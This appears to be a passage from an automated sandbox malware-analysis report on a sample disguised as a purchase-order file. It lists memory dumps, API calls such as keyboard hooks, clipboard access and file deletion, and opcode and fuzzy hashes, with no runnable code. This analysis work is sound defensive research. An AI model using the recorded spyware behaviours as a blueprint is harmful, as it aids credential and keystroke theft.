                                        • Opcode Fuzzy Hash: 555f0db15a43ae7e2f3d44934f87bb78b39d8f82d62aceea182e99119d6e7cf6
                                        • Instruction Fuzzy Hash: 8641BEB0C00719CFEB25DFAAC884BDEBBB5AF48304F60806AD408AB251DB755946CF90

                                        Control-flow Graph

control_flow_graph: [executed/not-executed graph of function 0x127d3e0-0x127d49a, not reproducible in text; API node: DuplicateHandle]
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0127D467
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 3fdb5e2da129264d4fb4b615083919b4e61ba9d7f03f26529f1aa96be26fe33e
                                        • Instruction ID: 6fb4e989f8d9c27a64f4f4a21c922dcd64aeba965005c73bf5aa9d16ed757177
                                        • Opcode Fuzzy Hash: 3fdb5e2da129264d4fb4b615083919b4e61ba9d7f03f26529f1aa96be26fe33e
                                        • Instruction Fuzzy Hash: A821C4B5900249DFDB10CFAAD884ADEBBF5EB48310F14841AE914A3350D374A944CFA5

                                        Control-flow Graph

control_flow_graph: [executed/not-executed graph of function 0x127d3d9-0x127d49a, not reproducible in text; API node: DuplicateHandle]
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0127D467
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: d2f4d18c56ef8060aa34d3ae7f020b5929a368a89db4aea3e33bb1a8d7c4b8d0
                                        • Instruction ID: bb33300a22d0e520f84b521f7d50d2d390d27d7c4c82abc08c92e0de1227f506
                                        • Opcode Fuzzy Hash: d2f4d18c56ef8060aa34d3ae7f020b5929a368a89db4aea3e33bb1a8d7c4b8d0
                                        • Instruction Fuzzy Hash: 9921B0B5D00249DFDB10CFAAD984ADEBBF5EB48214F14841AE918A3250D378A944CFA0

                                        Control-flow Graph

control_flow_graph: [executed/not-executed graph of function 0x127afd8-0x127b068, not reproducible in text; API node: GetModuleHandleW at 0x127b020]
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0127B03E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 726b51cc35fd7fff223b44432ad4277567e20ffe3e6ba5ac74a8d96064de3253
                                        • Instruction ID: e17e4fbad567a364522a8814e4ab0460cac39972c91739a1e818760b7c8b0daf
                                        • Opcode Fuzzy Hash: 726b51cc35fd7fff223b44432ad4277567e20ffe3e6ba5ac74a8d96064de3253
                                        • Instruction Fuzzy Hash: FB110FB5C0064A8FDB24CF9AD844BDEFBF4AB88214F10841AD528A7200D379A545CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754443117.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_122d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 640d10ca97f01b54944f3097aa10765dab41222ae6e0d7470723cef6be699daa
                                        • Instruction ID: 90693d5527df14e084f79f05d0d32633113393cccb80423e1a85e9b870044317
                                        • Opcode Fuzzy Hash: 640d10ca97f01b54944f3097aa10765dab41222ae6e0d7470723cef6be699daa
                                        • Instruction Fuzzy Hash: 83213471514348EFEB05DF94C9C0B2ABBA5FB85324F20C66DE9094B243C37AD806CA61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754443117.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_122d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92eeb4fbb6b98a909503179a1caf4f0261803fd8caa515dd084170673667dd15
                                        • Instruction ID: 78928e80b43e63ae13eedc213c49bb136fd1de5675eb36b6bdf355c3ff780636
                                        • Opcode Fuzzy Hash: 92eeb4fbb6b98a909503179a1caf4f0261803fd8caa515dd084170673667dd15
                                        • Instruction Fuzzy Hash: EA212271614348EFDB15DF64D880B1ABBA1FB84314F20C56DE94A4B2A2C77AD507CA62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754443117.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_122d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f8a135974f431290955a492c3d283116a1144a10c4522918b52f91661e2822a
                                        • Instruction ID: 161daf097503eee97756b53f168da3f0f1397ff9b7059a38669f0a259ad79f44
                                        • Opcode Fuzzy Hash: 9f8a135974f431290955a492c3d283116a1144a10c4522918b52f91661e2822a
                                        • Instruction Fuzzy Hash: D221B0714083849FCB02CF24D994715BF71EB46314F28C5EAD9498F2A7C33A980ACB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754443117.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_122d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c968dcaa042c25ee6ba8684c53e35a7e88ce7353a734fe3290a9ec7f8938d7ca
                                        • Instruction ID: 6685d5b7e6749a598c9793a987f9e1fa0cebf28b08a76753e149d361dd49afe0
                                        • Opcode Fuzzy Hash: c968dcaa042c25ee6ba8684c53e35a7e88ce7353a734fe3290a9ec7f8938d7ca
                                        • Instruction Fuzzy Hash: A511BB75504284EFDB02CF54C5C0B19FBB1FB85224F24C6A9D9494B697C33AD44ACB61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754387348.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_121d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1fc4d4ba9362ce23867c6d17944f6055a8bec54cf83fe31ffad8ade02b3cd9a3
                                        • Instruction ID: facf5de510189a57958545445229457a7db84622010400176586ce259ecacb39
                                        • Opcode Fuzzy Hash: 1fc4d4ba9362ce23867c6d17944f6055a8bec54cf83fe31ffad8ade02b3cd9a3
                                        • Instruction Fuzzy Hash: 2A01DB71114789DFF728DAA5DC88B67FBD8EF51624F18C41AEE090A28AC3799441CAB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754387348.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_121d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97b5580370157a3aa9fd00e02504c959aed1201d69be35daaaafed28e8b59995
                                        • Instruction ID: 37b9f6eec44afc94b7f1aed9ce7a59f3dd94b9a740c30ce10a2c74a0141731da
                                        • Opcode Fuzzy Hash: 97b5580370157a3aa9fd00e02504c959aed1201d69be35daaaafed28e8b59995
                                        • Instruction Fuzzy Hash: 24F0C271004385AEE7248A1ACC88B66FFE8EF51624F18C45AEE080B286C3799840CAB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: de51dad98fa09e544dd126ffc13d698fb7b01ace955dffc756d5f51185957e80
                                        • Instruction ID: 74c406a5309f03b13636382ee2058463555f4798a5a3a6a4b431325bfd9523e7
                                        • Opcode Fuzzy Hash: de51dad98fa09e544dd126ffc13d698fb7b01ace955dffc756d5f51185957e80
                                        • Instruction Fuzzy Hash: 04A19E32E2020A8FCF15DFB4D9449EEBBB2FF85300B15856AE915AB255DB71E906CB40
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1778881489.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7b70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1778881489.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7b70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761002748.00000000033AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033AD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_33ad000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761002748.00000000033AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033AD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_33ad000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1778881489.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7b70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,Sgl$,Sgl$d5Wk$Rgl$]l$]l
                                        • API String ID: 0-1364360042
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1761565989.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_4cf0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ?n^$?n^$?n^$?n^
                                        • API String ID: 0-3486349104

                                        Execution Graph

                                        Execution Coverage:9%
                                        Dynamic/Decrypted Code Coverage:99.5%
                                        Signature Coverage:0%
                                        Total number of Nodes:188
                                        Total number of Limit Nodes:22

                                        Control-flow Graph
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05688C0A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0

                                        Control-flow Graph
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05688C0A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0

                                        Control-flow Graph
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05688C0A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0

                                        Control-flow Graph
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0568D7A9
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0

                                        Control-flow Graph
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0

                                        Control-flow Graph
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0

                                        Control-flow Graph
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0568C8D7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0

                                        Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0568C8D7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: d3a069b790d26ec87aec99d568555531a098eff7472dd2a3b1550d5684231df0
                                        • Instruction ID: 9ebce4178a70bca25b136f11008ad4681cbf390120e6976093618cf6965f7d98
                                        • Opcode Fuzzy Hash: d3a069b790d26ec87aec99d568555531a098eff7472dd2a3b1550d5684231df0
                                        • Instruction Fuzzy Hash: 7421C4B5900249AFDB10CFAAD484AEEBBF8FB48310F14841AE915A7350D375A944CF65

                                        Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                                        APIs
                                        • DeleteFileW.KERNELBASE(00000000), ref: 00EC72D0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4181507986.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_ec0000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: fc68c4cf7506de17df83db4c9a95fc6947329aa025d15e0d55894800fec42468
                                        • Instruction ID: 13fb9b3a05ffafaec8bba0654b5cb2b394b0625ee506ed2c897e1aaa61edd2f6
                                        • Opcode Fuzzy Hash: fc68c4cf7506de17df83db4c9a95fc6947329aa025d15e0d55894800fec42468
                                        • Instruction Fuzzy Hash: B62133B1C0465A9FDB14CF9AC440BDEFBF4FB48320F10816AE818A7250D378AA45CFA0

                                        Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 00ECFDF3
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4181507986.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_ec0000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 9416427abaad84090e44e75171940d185973cd038a8ff4c4baf547a7d9310486
                                        • Instruction ID: c11b3480e02451f052c91b62cfd96bbb7479204801367423eb604b56e1348ca3
                                        • Opcode Fuzzy Hash: 9416427abaad84090e44e75171940d185973cd038a8ff4c4baf547a7d9310486
                                        • Instruction Fuzzy Hash: C62124B59002499FDB14CFAAC944BEEFBF5FB88320F14842AE419A7250C775A941CFA0

                                        Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 00ECFDF3
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4181507986.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_ec0000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: d00bad2ebacfe02ce36a48e4650a46177b579b9e75e97d671b27bc8a24d1af5c
                                        • Instruction ID: 4cda2fd3e3e66a5ca0ddef87a83a3d8c31b11553347a335527a04c1335a06b35
                                        • Opcode Fuzzy Hash: d00bad2ebacfe02ce36a48e4650a46177b579b9e75e97d671b27bc8a24d1af5c
                                        • Instruction Fuzzy Hash: BD2124B59002499FDB14CFAAC844BEEFBF5FB88310F10842AE419A7250C775A941CFA0

                                        Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                                        APIs
                                        • DeleteFileW.KERNELBASE(00000000), ref: 00EC72D0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4181507986.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_ec0000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 2bb1c999eac743a79a8eb2cbfef8fd451242aca6f27677cce67ff519d9261b8d
                                        • Instruction ID: 9c2874902ff698fd8c501a1287b54695343e40c6f61304e500b3231efe5ace81
                                        • Opcode Fuzzy Hash: 2bb1c999eac743a79a8eb2cbfef8fd451242aca6f27677cce67ff519d9261b8d
                                        • Instruction Fuzzy Hash: 9A1133B1C0465A9BDB14CF9AC544BEEFBF4FB48320F10812AE858B7240D778A941CFA5

                                        Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05687AB6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 30d6d3280b614d8cc26c14dc43e82d29356356b272d831f7452f4f98c86d234c
                                        • Instruction ID: 122f6e02f0a1a3949564919803a8b281c0f879aa65fea7a1e279258b0ea0739f
                                        • Opcode Fuzzy Hash: 30d6d3280b614d8cc26c14dc43e82d29356356b272d831f7452f4f98c86d234c
                                        • Instruction Fuzzy Hash: 741132B1C006498FDB10DF9AC444BAEFBF4EB88214F20856AD829B7300C776A605CFA0

                                        Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05687AB6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 2e862a1e6a3494f8da099ca5be96c1bc505c6f0e1ec93b47b979ac6c9b250c35
                                        • Instruction ID: dd0c68263d4230af9b63597aa8692796f51aa2762ae9f3b21b447a5c8efbf95a
                                        • Opcode Fuzzy Hash: 2e862a1e6a3494f8da099ca5be96c1bc505c6f0e1ec93b47b979ac6c9b250c35
                                        • Instruction Fuzzy Hash: C81102B5C0064A8FDB10DF9AD444BDEFBF4EB88210F14856AD469A7600C775A646CFA1
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0568E345
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: cd74bd07982e7ef4888c7e45bf9f3390556962a2f83494c5cd0c04bc3be2a0a4
                                        • Instruction ID: 0f978454a42af0a25a66e6e54e0ccd9ed5244f1623309ba423e67d2a5fde7438
                                        • Opcode Fuzzy Hash: cd74bd07982e7ef4888c7e45bf9f3390556962a2f83494c5cd0c04bc3be2a0a4
                                        • Instruction Fuzzy Hash: 011145B1800349CFDB20DF9AC484B9EFBF8EB48320F10845AD519A3700C375A940CFA4

                                        Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0568D9F5), ref: 0568DA7F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 48a9cf35190325dc3c0158676cc5b88d6ae0a3ab694d2df5d3401eb6d81809da
                                        • Instruction ID: 2da0264392f25532fb826f079b1399db643310c602933ca22fcc5a642f5298de
                                        • Opcode Fuzzy Hash: 48a9cf35190325dc3c0158676cc5b88d6ae0a3ab694d2df5d3401eb6d81809da
                                        • Instruction Fuzzy Hash: 3E1145B18043498FDB20DF9AD484BEEFBF8EB48314F248459D519A7340D775A940CFA4
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0568D9F5), ref: 0568DA7F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 019efe93880c7c6340f3c8bf3d5c69880be2436497182bd6baebbf303fe64df3
                                        • Instruction ID: 498b257a1a9a8de9547e193518b7401c74efa9a03fb205bbea0fb2e37a6f3e51
                                        • Opcode Fuzzy Hash: 019efe93880c7c6340f3c8bf3d5c69880be2436497182bd6baebbf303fe64df3
                                        • Instruction Fuzzy Hash: D61145B18043898FDB20DF9AC484BEEFBF8EB48310F24845AD419A3240C775A940CFA4
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0568E345
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 05047aa2d45a628ada9a3b0fffb0f26a5051fcd01c2bd35108e134b1c2f84ba3
                                        • Instruction ID: 8c5d1f475d0ef6de14b063dec8b5980f3defa934e7250dd66c31863623315c71
                                        • Opcode Fuzzy Hash: 05047aa2d45a628ada9a3b0fffb0f26a5051fcd01c2bd35108e134b1c2f84ba3
                                        • Instruction Fuzzy Hash: 711130B18003898FDB20DFAAD444BDEFBF8EB48224F24845AE518A3600C375A940CFA0
                                        Memory Dump Source
